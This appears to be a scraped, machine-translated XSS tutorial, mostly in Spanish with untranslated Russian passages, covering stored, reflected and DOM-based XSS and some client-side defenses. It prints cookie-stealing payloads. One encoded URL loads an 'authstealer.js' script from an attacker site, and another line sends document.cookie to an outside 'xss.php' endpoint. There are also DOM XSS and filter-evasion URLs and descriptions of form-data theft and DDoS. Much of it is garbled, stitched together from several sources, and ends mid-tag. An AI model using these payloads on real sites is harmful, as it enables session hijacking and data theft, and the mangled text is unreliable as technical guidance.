Formación de ataque XSS. Vulnerabilidad XSS - ¿Qué es? Ejemplos de vulnerabilidades XSS. Datos de formularios llenos

Intersype Scripting (XSS) es una vulnerabilidad que es para implementar el código ejecutable en el lado del cliente (JavaScript) en la página web que se presentan a otros usuarios.

La vulnerabilidad surge debido a un filtrado de datos insuficiente, que el usuario envía para insertar en una página web. Es mucho más fácil entender ejemplo específico. Recuerda cualquier libro de visitas - Estos son programas que están destinados a aceptar datos del usuario y la pantalla posterior. Imagine que el libro de visitas no compruebe de ninguna manera y no filtra los datos ingresados, sino que simplemente los muestra.

Puedes probar tu propio guión más sencillo (No hay nada más fácil que escribir bad scripts en PHP, esto está muy involucrado en esto). Pero ya hay muchas opciones preparadas. Por ejemplo, propongo iniciar un conocido con Dojo y Owasp Mutillidae II. Hay un ejemplo similar. En el entorno de Dojo independiente, vaya al navegador por referencia: http: //localhost/mutillidae/index.php? Página \u003d Agregar a su blog.php

Si alguien de los usuarios ingresó:

Esa página web se mostrará:

¡Oye! Como tu sitio

Y si el usuario entra en esto:

¡Oye! Como tu sitio

Que se mostrará así:

Los navegadores mantienen un conjunto de galletas. gran número sitios Cada sitio puede obtener galletas solo ahorradas a ellas. Por ejemplo, el sitio web de Ejemplos.com ha conservado algunas cookies en su navegador. Usted es el choque al sitio de otro.com, este sitio (Scripts de cliente y servidor) no puede acceder a las cookies que el sitio web de Ejemplos se ha guardado.

Si el sitio Ejemply.com es vulnerable a XSS, esto significa que podemos, de una manera u otra para implementar el código JavaScript en él, y este código se ejecutará en nombre del sitio Ejemply.com! Esos. Este código recibirá, por ejemplo, el acceso al sitio de Cookis Site Ejemplo.com.

Creo que todos recuerdan que JavaScript se ejecuta en los navegadores de usuarios, es decir. Con la presencia de XSS, incrustada. código malicioso Obtiene acceso a los datos de usuario que abrieron la página del sitio web.

El código incrustado es capaz de todo lo que JavaScript Can, a saber:

acceso a las cookies del sitio visto.
puede hacer cualquier cambio en apariencia páginas
acceso al búfer de intercambio.
puede implementar programas en JavaScript, por ejemplo, ki-loggers (interceptores clave empujados)
toque en la carne.
y etc.

El ejemplo más simple Con Cookiz:

De hecho, alerta. Se utiliza solo para detectar XSS. Real Malware Payloads ACCIONES OCULTADAS. Está oculto se une a un servidor de intrusos remoto y transmite datos robados en él.

Tipos de XSS.

Lo más importante es que necesite entender sobre los tipos de XSS lo que suceden:

Almacenado (constante)
Reflejado (no permanente)

Ejemplo de permanente:

Un atacante introdujo un mensaje formado especialmente al libro de visitas (comentarios, mensaje de foro, perfil) que se almacena en el servidor, cargado desde el servidor cada vez que los usuarios solicitan la visualización de esta página.
El atacante recibió acceso a los datos del servidor, por ejemplo, a través de la inyección de SQL e introducida en los datos llamados por el usuario para el código de JavaScript malicioso (con los registradores de ki o con la carne de res).

Muestra de no permanente:

El sitio tiene una búsqueda, que, junto con los resultados de búsqueda, muestra algo como "Estaba buscando: [Cadena de búsqueda]", mientras que los datos no se filtran correctamente. Dado que una página de este tipo se muestra solo para tener un enlace a él, mientras que el atacante no enviará el enlace a otros usuarios del sitio, el ataque no funcionará. En lugar de enviar una referencia a la víctima, puede usar la colocación de un guión malicioso en un sitio neutral que visita la víctima.

Todavía se destacan (algunos como una especie de vulnerabilidades de XSS no permanentes, algunos dicen que esta especie puede ser una variedad de XSS constante):

Modelo DOM

Características XSS basadas en DOM

Si es completamente simple, el código malicioso "ordinario" no permanezca XSS se puede ver si abre el código HTML. Por ejemplo, el enlace se forma de esta manera:

Http://example.com/search.php?q\u003d "/\u003e

Y al abrir el código HTML original, vemos algo como esto:

Y DOM XSS está cambiando la estructura DOM que se forma en el navegador sobre la marcha y vea el código malicioso solo podemos al ver la estructura de DOM formada. HTML no cambia. Tomemos este código, por ejemplo:

sitio ::: DOM XSS

Ocurrió un error ...

Que en el navegador veremos:

Código fuente de la página:

Vamos a formar la dirección de la siguiente manera:

Http: //localhost/tests/xss/dom_xss.html#Input\u003dtokenalex.;

Ahora la página se ve así:

Pero miremos fuente HTML:

No hubo absolutamente nada cambiado. Sobre esto, dije, necesitamos ver el documento de la estructura dom para identificar el código malicioso:

Aquí hay un prototipo de trabajo XSS, para un ataque real, necesitamos una carga útil más compleja que sea imposible debido al hecho de que la aplicación deja de leer inmediatamente después de un punto con una coma, y \u200b\u200balgo así como alerta (1); alerta (2) Ya no es posible. Sin embargo, gracias a insensape () En los datos devueltos, podemos usar la carga útil como esta:

Http: //localhost/tests/xss/dom_xss.html#Input\u003dtokenalex.;

Donde reemplazamos el símbolo ; ¡En el equivalente codificado en la URI!

Ahora podemos escribir un malware de JavaScript y hacer un enlace para enviar a la víctima, como se realiza para obtener secuencias de comandos estándar no permanentes.

Auditor XSS

EN Google Chrome. (así como en la ópera, que ahora usa el motor de Google Chrome), estaba esperando tal sorpresa:

dom_xss.html: 30 El auditor XSS se negó a ejecutar un script en "http: //localhost/tests/xss/dom_xss.html#input\u003dtoken \u003cscript\u003e alerta (1)"Porque su código fuente se encontró dentro de la solicitud. El auditor se habilitó a medida que el servidor no envió un encabezado" X-XSS-Protection "ni" Content-Security-Política-Política ".

Esos. Ahora, en el navegador hay un auditor XSS que intentará prevenir XSS. No hay tal funcionalidad en Firefox, pero creo que esta es una cuestión de tiempo. Si la implementación en los navegadores tendrá éxito, entonces podemos hablar de una dificultad significativa de usar XSS.

Es útil recordar que navegadores modernos Tome medidas para limitar el nivel de operación de problemas como XSS no permanentes y se basa en DOM XSS. Incluirlo es necesario recordar al probar los sitios web que utilizan un navegador, puede ser que la aplicación web sea vulnerable, pero no ve una confirmación emergente por la razón de que el navegador lo bloquea.

Ejemplos de explotación XSS.

Los maleferentes, con la intención de usar las vulnerabilidades de scripts de intersitio, deben acercarse a cada clase de vulnerabilidades de diferentes maneras. Aquí se describen los vectores de los ataques por cada clase.

Con las vulnerabilidades XSS, la carne se puede usar en ataques, que amplía el ataque desde el sitio web al entorno local de los usuarios.

Ejemplo de ataque con XSS no permanente.

1. Alice a menudo visita un sitio web específico que alberga a Bob. El sitio web de Bob permite a Alicia iniciar sesión con el nombre del usuario / contraseña y ahorrar datos confidenciales, como la información de pago. Cuando el usuario ejerce la entrada, el navegador conserva las cookies de autorización que se parecen a caracteres sin sentido, es decir, Ambas computadoras (cliente y servidor) recuerdan que ingresó.

2. Maláticas señala que el sitio web de Bob contiene vulnerabilidad XSS no permanente:

2.1 Al visitar la página de búsqueda, ingresamos una línea para buscar y hacer clic en el botón Enviar si no se encuentran los resultados, la página muestra la cadena de búsqueda ingresada, seguida de las palabras "no encontradas" y la URL http://bobsssite.org?q\u003dyu consulta de busqueda

2.2 Con una consulta de búsqueda normal como la palabra " perrito»Página simplemente se muestra" perrito No encontrado "y URL http://bobssites.org?q\u003d perrito¿Cuál es el comportamiento bastante normal?

2.3 Sin embargo, cuando se envía una consulta anormal búsqueda a la búsqueda :

2.3.1 Aparece un mensaje de advertencia (que dice "XSS").

2.3.2 PAGADAS PAYAS extraviado Junto con un mensaje de error con el texto "XSS".

2.3.3 URL Adecuado para la operación http://bobssites.org?q\u003d.alert("xss");

3. Los malogros diseña la URL para operar la vulnerabilidad:

3.1 Ella hace URL http://bobsssite.org?q\u003dpuppies. . Puede elegir convertir los caracteres ASCII en un formato hexadecimal, como http://bobssite.org?q\u003dpuppies%3cscript%2520src%3d%22http%3a%2f%2fmallororysevilsite.com%2fauthstealer.js%22%3e. Para que las personas puedan descifrar inmediatamente una URL maliciosa.

3.2 Ella envía un correo electrónico a algún miembro desprevenido del sitio Bob, diciendo: "Echa un vistazo a los perros geniales".

4. Alice recibe una carta. A ella ama a los perros y hace clic en el enlace. Ella va al sitio Bob en la búsqueda, ella no encuentra nada, muestra los "perros que no se encuentran", y en el centro de la etiqueta, la etiqueta se inicia con un script (es invisible en la pantalla), carga y ejecuta el programa Malory AuthStealer.js (ataque XSS). Alice se olvida de ello.

5. El programa AuthStealer.js comienza en el navegador de Alice como si su origen es el sitio web de Bob. Captura una copia de las cookies de autorización de Alice y envía al servidor Malory, donde los maldiciones los eliminan.

7. Ahora que las malorias adentro, se dirige al sitio web del sitio web, se ve y roba una copia del número de tarjeta de crédito de Alice. Luego ella va y cambia la contraseña, es decir,. Ahora Alice ni siquiera puede ir.

8. Ella decide tomar el siguiente paso y envía una referencia a Bob mismo de manera similar de manera similar, y por lo tanto obtiene privilegios administrativos del sitio de Bob.

Ataque con XSS constante.

Malories tiene una cuenta en el sitio Bob.
Malory señala que el sitio web de Bob contiene una vulnerabilidad XSS constante. Si vas a nueva sección, Coloque un comentario, luego muestra que no se imprimiría. Pero si el texto del comentario contiene etiquetas HTML, estas etiquetas se mostrarán como es, y se inicie cualquier etiqueta de secuencias de comandos.
Malory lee un artículo en la sección de noticias y escribe un comentario en la sección de comentarios. En el comentario, inserta el texto:
En esta historia me gustaron tanto los perros. ¡Son muy agradables!
Preste atención a la que los códigos del Código HTML caen su código incorporado. Aquí hay un ejemplo de un campo de entrada de campo típico ( aporte):

Nuestra carga útil irá a donde se encuentra la palabra "funda de almohada". Esos. convertirse en etiqueta aporte. Podemos evitar esto, cerca de una cotización doble, y luego la etiqueta con "/>

"/>
Proprendemosla por algunos sitios:

Excelente vulnerabilidad

Programas para búsqueda y escaneo Vulnerabilidad XSS

Probablemente todos los escáneres de aplicaciones web tienen un escáner de vulnerabilidad XSS incorporado. Este tema está awkhanging, es mejor familiarizarse con cada escáner de este tipo por separado.

Scripts de sitio cruzado (XSS abreviado) es una vulnerabilidad generalizada que afecta a muchas aplicaciones web. Permite a un atacante implementar un código malicioso en un sitio web de tal manera que el navegador de usuario que ingrese al sitio ejecute este código.

Por lo general, se requiere una cierta interacción con el usuario para operar esta vulnerabilidad: ya sea atraída a un sitio infectado con ingeniería social, o simplemente esperando hasta que él mismo visite este sitio. Por lo tanto, los desarrolladores a menudo no se perciben seriamente XS-Vulnerabilidad.

Pero si no son eliminados, puede ser una grave amenaza de seguridad.

Imagínese que estamos en el panel de administración de WordPress, agregue nuevo contenido. Si usamos un complemento vulnerable a XSS, puede hacer que el navegador cree un nuevo administrador, modifique el contenido y realice otras acciones maliciosas. Scripting cruzado proporciona a un atacante con un control casi completo sobre lo más importante software Hoy en día - navegador.

XSS: Vulnerabilidad de la inyección

Cualquier sitio web o aplicación tiene varios sitios de entrada de datos, formulan a la URL en sí. El ejemplo más simple de los datos de entrada es cuando entramos en el nombre de usuario y la contraseña:

Nuestro nombre se almacenará en la base de datos del sitio para una interacción posterior con nosotros. Seguramente, cuando pasaste la autorización en cualquier sitio, viste un saludo personal al estilo de "Bienvenido, Ilya".

Es para fines tales que los nombres de usuario se almacenan en la base de datos.

La inyección se denomina procedimiento cuando, en lugar de un nombre o contraseña, una secuencia especial de símbolos que hace que el servidor o un navegador responda a ciertos, se ingresa el atacante deseado.

Un script de Intersight se llama inyección que implementa el código que realizará acciones en el navegador en nombre del sitio web. Puede ocurrir tanto con la notificación del usuario como en modo de fondo, sin su conocimiento.

Ataques tradicionales XSS:

Reflejado (no permanente).

El ataque XSS reflejado se activa cuando el usuario va a un enlace especialmente preparado.

Estas vulnerabilidades aparecen cuando los datos proporcionados por el cliente web se encuentran con mayor frecuencia en los parámetros de la consulta HTTP o en forma de HTML se ejecutan directamente por scripts de servidor a análisis sintáctico y visualizar la página de resultados de este cliente, sin procesamiento adecuado.

Almacenado (constante).

Los XS almacenados son posibles cuando un atacante logra implementar un código malicioso en el servidor, ejecutándose en el navegador cada vez que accede a la página original. El ejemplo clásico de esta vulnerabilidad son foros en los que se le permite dejar comentarios en formato HTML.

Vulnerabilidades causadas por el código en el lado del cliente (JavaScript, Visual Basic, Flash, etc.):

También conocidos como modelos DOM:

Reflejado (no permanente).

Lo mismo que en el caso del lado del servidor, solo en este caso, el ataque es posible debido al hecho de que el código es procesado por el navegador.

Almacenado (constante).

Similar al almacenamiento de XSS en el lado del servidor, solo en este caso, el componente malicioso se guarda en el lado del cliente con el almacenamiento del navegador.

Ejemplos de vulnerabilidades XSS.

Curiosamente, en la mayoría de los casos, esta vulnerabilidad se describe, estamos asustados por el siguiente código:
Http://www.site.com/page.php?var\u003d
Hay dos tipos de vulnerabilidades XSS, pasivas y activas.

Vulnerabilidad activa Más peligroso, como un atacante no necesita atraer el sacrificio en un enlace especial, es suficiente para él implementar el código en la base o en algún archivo en el servidor. Por lo tanto, todos los visitantes del sitio se convierten automáticamente a las víctimas. Puede integrarse, por ejemplo, al incrustar el código SQL (inyección de SQL). Por lo tanto, no debe confiar en los datos almacenados en la base de datos, incluso si en el inserto se procesaron.

Ejemplo vulnerabilidad pasiva Puedes ver al principio del artículo. Ya hay ingeniería social, por ejemplo, una carta importante de la administración del sitio que le pide que verifique la configuración de su cuenta, después de la recuperación de la copia de seguridad. En consecuencia, debe conocer la dirección de la víctima o simplemente organizar un boletín de noticias de spam o colocar una publicación en algún foro, y aún no el hecho de que las víctimas sean ingenuas y vaya a su enlace.

Además, las vulnerabilidades pasivas pueden estar sujetas a la publicación y obtener parámetros. Con los parámetros posteriores, se entenderá, tendrá que ir en trucos. Por ejemplo, redirección del sitio del intruso.

En consecuencia, la vulnerabilidad de obtener un poco más peligrosa, porque La víctima es más fácil de notar el dominio incorrecto que parámetro adicional (Aunque la URL se puede codificar en absoluto).

Galletas

Este es el ejemplo más frecuente de los ataques XSS. En los sitios de cookies a veces almacenan cualquier información valiosa (a veces incluso de inicio de sesión y contraseña (o su hash) del usuario), pero el más peligroso es el robo de una sesión activa, por lo que no se olvide de presionar el enlace "Salir" en los sitios, incluso si computador de casa. Afortunadamente, en la mayoría de los recursos, la vida útil de la sesión es limitada.
Var _mg \u003d nueva imagen (); Іmg.sps \u003d "http: //site/xss.php?" + document.cookie;
Por lo tanto, las restricciones de dominio en XMLHTTPRequest, pero el atacante no tiene miedo porque hay , <img>, <script>, background:url(); и т.п.</p> <h3>Кража данных из форм</h3> <p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p> <p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p> <h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3> <p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><p> <img src='https://i0.wp.com/site.com/' loading=lazy loading=lazy> </p><h2>В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости.</p> <p>Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <p>Все мы знаем, что такое межсайтовый скриптинг, правда? Это уязвимость, при которой атакующий посылает злонамеренные данные (обычно это HTML, содержащий код Javascript), которые позднее возвращаются приложением, что вызывает исполнение Javascript кода. Итак, это неверно! Существует тип XSS атак не соответствующий этому определению, по крайней мере, в основных фундаментальных принципах. XSS атаки, определение которых приведено выше, подразделяются на моментальные (злонамеренные данные встраиваются в страницу, которая возвращается браузеру сразу же после запроса) и отложенные (злонамеренные данные возвращаются через некоторое время). Но есть еще третий тип XSS атак, в основе которого не лежит отправка злонамеренных данных на сервер. Несмотря на то, что это кажется противоречащим здравому смыслу, есть два хорошо описанных примера такой атаки. Эта статья описывает третий тип XSS атак – XSS через DOM (DOM Based XSS). Здесь не будет написано ничего принципиально нового об атаке, скорее новшество этого материала в выделении <a href="https://newtravelers.ru/es/setting/testirovanie-skorosti-ssd-kak-proverit-skorost-diska-hdd-ssd-test.html">отличительных черт</a> атаки, которые являются очень важными и интересными.</p> <p>Разработчики и пользователи прикладных приложений должны понимать принципы атаки XSS через DOM, так как она представляет угрозу для web приложений и отличается от обычного XSS. В сети интернет есть много web приложений уязвимых к XSS через DOM и при этом проверенных на XSS и признанных “неуязвимыми” к этому типу атак. Разработчики и администраторы сайтов должны ознакомиться с методами обнаружения и защиты от XSS через DOM, так как эти методики отличаются от приемов, используемых при работе со стандартными XSS уязвимостями.</p> <h3>Введение</h3> <p>Читатель должен быть знаком с основными принципами XSS атак (, , , , ). Под XSS обычно подразумевается моментальный () и отложенный межсайтовый скриптинг. При моментальном XSS злонамеренный код (Javascript) возвращается атакуемым сервером немедленно в качестве ответа на HTTP запрос. Отложенный XSS означает, что злонамеренный код сохраняется на атакуемой системе и позднее может быть внедрен в <a href="https://newtravelers.ru/es/error/tegi-html-opredeleniya-ramki-stranicy-atributy-html-tegov-sozdanie-form-i.html">HTML страницу</a> уязвимой системы. Как было упомянуто выше, такая классификация предполагает, что фундаментальное свойство XSS состоит в том, что злонамеренный код отсылается из браузера на сервер и возвращается в этот же браузер (моментальный XSS) или любой другой браузер (отложенный XSS). В этой статье поднимается вопрос о том, что это неверная классификация. Возможность осуществления XSS атаки, не основывающейся на внедрении кода в страницу, возвращаемую сервером, оказала бы серьезное влияние на методы защиты и обнаружения. Принципы таких атак обсуждаются в этой статье.</p> <h3>Пример и комментарии</h3> <p>Перед описанием простейшего сценария атаки важно подчеркнуть, что методы, описываемые здесь, уже неоднократно демонстрировались публично (например, , и ). Я не претендую на то, что приведенные ниже методики описываются впервые (хотя некоторые из них имеют отличия от ранее опубликованных материалов).</p> <p>Признаком уязвимого сайта может служить наличие HTML страницы, использующей данные из document.location, document.URL или document.referrer (или любых других объектов на которые может влиять атакующий) небезопасным способом.</p> <p>Примечание для читателей незнакомых с этими <a href="https://newtravelers.ru/es/wireless/vvedenie-v-vsplyvayushchie-sobytiya-prodvinutaya-rabota-s-obektom.html">объектами Javascript</a>: когда код Javascript выполняется в браузере, он получает доступ к нескольким объектам, представленных в рамках DOM (Document <a href="https://newtravelers.ru/es/error/ispolzovanie-xml-document-object-model-putevoditel-po-internetu---vse.html">Object Model</a> – Объектная Модель Документа). Объект document является главным среди этих объектов и предоставляет доступ к большинству свойств страницы. Этот объект содержит много вложенных объектов, таких как location, URL и referrer. Они управляются браузером в соответствии с точкой зрения браузера (как будет видно ниже, это весьма существенно). Итак, document.URL и document.location содержат URL страницы, а точнее, то, что браузер подразумевает под URL. Обратите внимание, эти объекты не берутся из тела HTML страницы. Объект document содержит объект body, содержащий обработанный (parsed) HTML код страницы.</p> <p>Не сложно найти HTML страницу, содержащую Javascript код, который анализирует строку URL (получив к ней доступ через document.URL или document.location) и в соответствии с ее значением выполняет некоторые действия на стороне клиенте. Ниже приведен пример такого кода.</p> <p>По аналогии с примером в рассмотрим следующую HTML страницу (предположим, что это содержание <span>http://www.vulnerable.site/welcome.html </span>):</p> <p><HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Bienvenido a nuestro sistema ...</HTML></p> <p>Sin embargo, la solicitud como esta -</p> <p>http://www.vulnerable.site/welcome.html?name\u003d.<script>alert(document.cookie)</script></p> <p>llamado XSS. Considere por qué: el navegador de la víctima que recibió este enlace envía una solicitud HTTP a www.vulnerable.site y recibe la página HTML mencionada (estática!). El navegador de la víctima comienza a analizar este código HTML. DOM contiene un objeto de documento que tiene un campo de URL, y este campo se llena con el valor de la URL de la página actual durante el proceso de creación de DOM. Cuando el analizador de sintaxis llega al código JavaScript, lo ejecuta que causa la modificación del código HTML de la página mostrada. En este caso, el código se refiere al documento. Y, ya que parte de esta línea durante el pavimento de sintaxis está incrustada en HTML, que se analiza inmediatamente, el código detectado (alerta (...)) se realiza en el contexto del mismo página.</p> <p>Observaciones:</p> <p>1. El código malicioso no está incrustado en la página HTML (a diferencia de otras especies de XSS). <br> 2. Esta explotación funcionará con la condición de que el navegador no modifique los caracteres de la URL. Mozilla codifica automáticamente los caracteres '<’ и ‘>'(En% 3C y% 3E, respectivamente) en los objetos de documentos adjuntos. Si la URL se imprimió directamente en la barra de direcciones, este navegador es invulnerable al ataque descrito en este ejemplo. Sin embargo, si los personajes no necesitan atacar '<’ и ‘>'(En la forma inicial inextada) se puede implementar un ataque. Microsoft. <a href="https://newtravelers.ru/es/useful/ie-ne-mozhet-otobrazit-stranicu-internet-explorer-ne-mozhet-otobrazit.html">Explorador de Internet.</a> 6.0 no codifica '<’ и ‘>'Y por lo tanto, vulnerable al ataque descrito sin restricciones. Sin embargo, hay muchos escenarios diferentes de ataques que no requieren<’ и ‘>', Y por lo tanto, incluso Mozilla no tiene inmunidad a este ataque.</p> <h3>Métodos para detectar y prevenir vulnerabilidades de este tipo.</h3> <p>En el ejemplo anterior, el código malicioso aún se transmite al servidor (como parte de la consulta HTTP), por lo que se puede detectar el ataque, así como cualquier otro ataque XSS. Pero este es un problema resuelto.</p> <p>Considere el siguiente ejemplo:</p> <p>http://www.vulnerable.site/welcome.html#name\u003d.<script>alert(document.cookie)<script></p> <p>Обратите внимание на символ ‘#’ справа от имени файла. Он говорит браузеру, что все после этого символа не является частью запроса. Microsoft Internet Explorer (6.0) и Mozilla не отправляет фрагмент после символа ‘#’ на сервер, поэтому для сервера этот запрос будет эквивалентен http://www.vulnerable.site/welcome.html, т.е. злонамеренный код даже не будет замечен сервером. Таким образом, благодаря этому приему, браузер не отправляет злонамеренную полезную нагрузку на сервер.</p> <p>Но все же в некоторых случаях невозможно скрыть полезную нагрузку: в и злонамеренная полезная нагрузка является частью имени пользователи (username) в URL типа http://username@host/. В этом случае браузер отправляет запрос с заголовком Authorization, содержащий имя пользователи (злонамеренная полезная нагрузка), в результате чего злонамеренный код попадает на сервер (закодированный с помощью Base64 – следовательно IDS/IPS для обнаружения атаки должны вначале декодировать эти данные). Однако сервер не обязан внедрять эту полезную нагрузку в одну из доступных HTML страниц, хотя это является необходимым условием выполнения XSS атаки.</p> <p>Очевидно, что в ситуациях, когда полезная нагрузка может быть полностью скрыта, средства обнаружения (IPS) и предотвращения (IPS, межсетевые экраны для web приложений) не могут полностью защитить от этой атаки. Даже если полезную нагрузку нужно отсылать на сервер, во многих случаях для избежания обнаружения она может быть преобразована определенным образом. Например, если какой-то параметр защищен (к примеру, параметр name в примере выше), небольшое изменение сценария атаки может принести результат:</p> <p><script>(document.cookie)</script></p> <p>Una política de seguridad más estricta requeriría una referencia obligatoria al parámetro Nombre. En este caso, puede hacer la siguiente consulta:</p> <p>http://www.vulnerable.site/welcome.html?notname\u003d <script>alerta (document.cookie) <script>& Name \u003d Joe</p> <p>Si la política de seguridad limita los nombres de parámetros adicionales (por ejemplo: FOOBAR), puede usar la siguiente opción:</p> <p>http://www.vulnerable.site/welcome.html?foobar\u003dname\u003d. <script>alerta (document.cookie) <script>& Name \u003d Joe</p> <p>Tenga en cuenta que el parámetro ignorable (foobar) debe ir primero y en su valor para contener una carga útil.</p> <p>El script de ataque descrito en es aún más preferible para el atacante, ya que un documento completo.Location se escribe en la página HTML (el código Javascript no busca un nombre de parámetro específico). Por lo tanto, el atacante puede ocultar completamente la carga útil enviando lo siguiente:</p> <p>/Atachment.cgi?id\u003d&action\u003dfoobar#<script>alert(document.cookie)</script></p> <p>Incluso si la carga útil es analizada por el servidor, la protección puede garantizarse solo si la solicitud se rechaza o la respuesta será reemplazada por algún texto de error. Vuelvemos hacia atrás y: si el encabezado de autorización es simplemente eliminado por el sistema de protección intermedia, no traerá ningún efecto si se devuelve la página original. De manera similar, cualquier intento de procesar datos en el servidor, eliminar o codificar caracteres prohibidos, será ineficaz contra este ataque.</p> <p>En el caso de Document.referrer, la carga útil se envía al servidor a través del encabezado del árbitro. Sin embargo, si el navegador del usuario o la protección intermedia elimina este título, no habrá rastro del ataque, que puede estar completamente inadvertido.</p> <p>Resumiendo, concluimos que los métodos tradicionales, a saber,</p> <p>1. codificación <a href="https://newtravelers.ru/es/useful/vyvod-otpravlennyh-formoi-dannyh-v-php-sozdanie-html-form-ii-vvod.html">datos HTML</a> En el lado del servidor <br> 2. El borrado / codificación de datos de entrada prohibidos en el lado del servidor no funciona contra DOM XSS.</p> <p>La búsqueda automática de vulnerabilidad por "bombardeo", los datos maliciosos (a veces llamados Fuzzing) no funcionarán, ya que los programas que utilizan esta técnica generalmente hacen conclusiones basadas en si los datos incrustados están presentes en la página devuelta o no (en lugar de realizar el código en el contexto de El navegador a lado del cliente y observación de resultados). Sin embargo, si un programa puede analizar estáticamente el código JavaScript, detectado en la página, puede indicar signos sospechosos (ver más abajo). Y, por supuesto, si las herramientas de seguridad pueden ejecutar el código JavaScript (y inicializar correctamente los objetos DOM) o emular dicha ejecución, podrán detectar este ataque.</p> <p>La búsqueda manual de vulnerabilidad con un navegador también funcionará, ya que el navegador puede ejecutar el código del cliente de JavaScript. Las herramientas de vulnerabilidad pueden adoptar este método y ejecutar código en el lado del cliente para rastrear los resultados de su ejecución. <br> Protección efectiva</p> <p>Evite reescribir un documento en el lado del cliente, redirección u otras acciones similares utilizando los datos en el lado del cliente. La mayoría de estas acciones se pueden realizar utilizando páginas dinámicas (en el lado del servidor). <br> 2.</p> <p>Análisis y mejora de la seguridad del código en el lado del cliente. Enlaces a los objetos DOM a los que el usuario puede afectar (atacante) debe verificarse cuidadosamente. Se debe prestar especial atención a los siguientes objetos (pero no limitados a ellos): <br> * document.url <br> * document.urluencoded <br> * Documento. Locación (y sus propiedades) <br> * Documento. Referrador. <br> * Ventana. Locación (y sus propiedades)</p> <p>Tenga en cuenta que: las propiedades del documento y los objetos de la ventana se pueden referir de varias maneras: explícitamente (ejemplo - vitrina.location.location), implícitamente (ejemplo - ubicación) o a través de la recepción del descriptor y usándolo (ejemplo - manejador_to_some_window.location) .</p> <p>Se debe prestar especial atención al código donde DOM se modifica, explícitamente o existe una oportunidad potencial, así como el acceso directo a HTML o a través del acceso directamente al DOM. Ejemplos (esto no es de ninguna manera una lista exhaustiva): <br> * Registro en el código de página HTML: <br> o Documento. Escrito (...) <br> o Documento.Writeln (...) <br> o Documento.body.innerhtml \u003d ... <br> * Cambiar DOM directamente (incluidos los eventos DHTML): <br> o Documento.Forms.action \u003d ... (y otras variaciones) <br> o Documento.AttachEvent (...) <br> o Documento. CREETE ... (...) <br> o Documento.Execcommand (...) <br> o Documento.body. ... (acceso a dom a través del objeto del cuerpo) <br> o Window.Attachevent (...) <br> * Cambiar la URL del documento: <br> o Document.Location \u003d ... (así como la asignación de valores HREF, anfitrión y nombre de host. <br> o Documento.Loocation.HostName \u003d ... <br> o document.location.replace (...) <br> o Documento.Location.Asign (...) <br> o document.url \u003d ... <br> o ventana.navigate (...) <br> * Apertura / modificación del objeto de la ventana: <br> o document.open (...) <br> o ventana.open (...) <br> o window.location.href \u003d ... (además de asignar el valor de la ubicación del objeto del host y el nombre de host)) <br> * Ejecución de script directamente: <br> o eval (...) <br> o Window.Execscript (...) <br> O ventana.setinterval (...) <br> O ventana.settimeout (...)</p> <p>A la continuación del ejemplo mencionado anteriormente, para proteger efectivamente el script original puede reemplazarse por el siguiente código que verifica la cadena escrita a la página HTML solo para los caracteres alfanuméricos.</p> <p>¿Qué es la vulnerabilidad XSS? ¿Vale la pena temer?</p> <p>Scripts de sitio cruzado (XSS abreviado) es una vulnerabilidad generalizada que afecta a muchas aplicaciones web. Permite a un atacante implementar un código malicioso en un sitio web de tal manera que el navegador de usuario que ingrese al sitio ejecute este código.</p> <p>Por lo general, se requiere una cierta interacción con el usuario para operar esta vulnerabilidad: ya sea atraída a un sitio infectado con ingeniería social, o simplemente esperando hasta que él mismo visite este sitio. Por lo tanto, los desarrolladores a menudo no se perciben seriamente XS-Vulnerabilidad. Pero si no son eliminados, puede ser una grave amenaza de seguridad.</p> <p>Imagínese que estamos en el panel de administración de WordPress, agregue nuevo contenido. Si usamos un complemento vulnerable a XSS, puede hacer que el navegador cree un nuevo administrador, modifique el contenido y realice otras acciones maliciosas.</p> <p>Intersype Scripting proporciona a un atacante con un control casi completo sobre el software más importante hoy en día - navegador.</p> <h2> XSS: Vulnerabilidad de la inyección</h2> <p>Cualquier sitio web o aplicación tiene varios sitios de entrada de datos, formulan a la URL en sí. El ejemplo más simple de los datos de entrada es cuando entramos en el nombre de usuario y la contraseña:</p> <p><b>Figura 1. Formulario de entrada de datos</b></p> <p>Nuestro nombre se almacenará en la base de datos del sitio para una interacción posterior con nosotros. Seguramente, cuando pasaste la autorización en cualquier sitio, viste un saludo personal al estilo de "Bienvenido, Ilya". Es para fines tales que los nombres de usuario se almacenan en la base de datos.</p> <p>La inyección se denomina procedimiento cuando, en lugar de un nombre o contraseña, una secuencia especial de símbolos que hace que el servidor o un navegador responda a ciertos, se ingresa el atacante deseado.</p> <p>Un script de Intersight se llama inyección que implementa el código que realizará acciones en el navegador en nombre del sitio web. Puede ocurrir tanto con la notificación del usuario como en el fondo, sin su conocimiento.</p> <p><b>Figura 2. Esquema visual del guión cruzado</b></p> <p><img src='https://i0.wp.com/anti-malware.ru/files/xss-example-flow-diagram1.png' width="100%" loading=lazy loading=lazy></p> <p>Como el ejemplo más simple, puede traer un script elemental que muestra una ventana de notificación. Se parece a esto:</p> <p><b>Tabla 1. Script, causando una ventana emergente</b></p> <p><script>alert(" ЭТО <span>XSS- </span>УЯЗВИМОСТЬ !!!")</script> </p> <p>Este script llama a la ventana con la inscripción "¡Esto es XSS-Vulnerabilidad!". El navegador del usuario percibe y ejecuta este script como parte del código legítimo del sitio.</p> <h2> Tipos de vulnerabilidades XSS.</h2> <p>No todas las vulnerabilidades XSS son las mismas, hay muchos tipos de ellos. Los tipos y métodos de su interacción se enumeran aquí:</p> <p><b>Figura 3. Tipos de vulnerabilidades XSS</b></p> <p><b><br><img 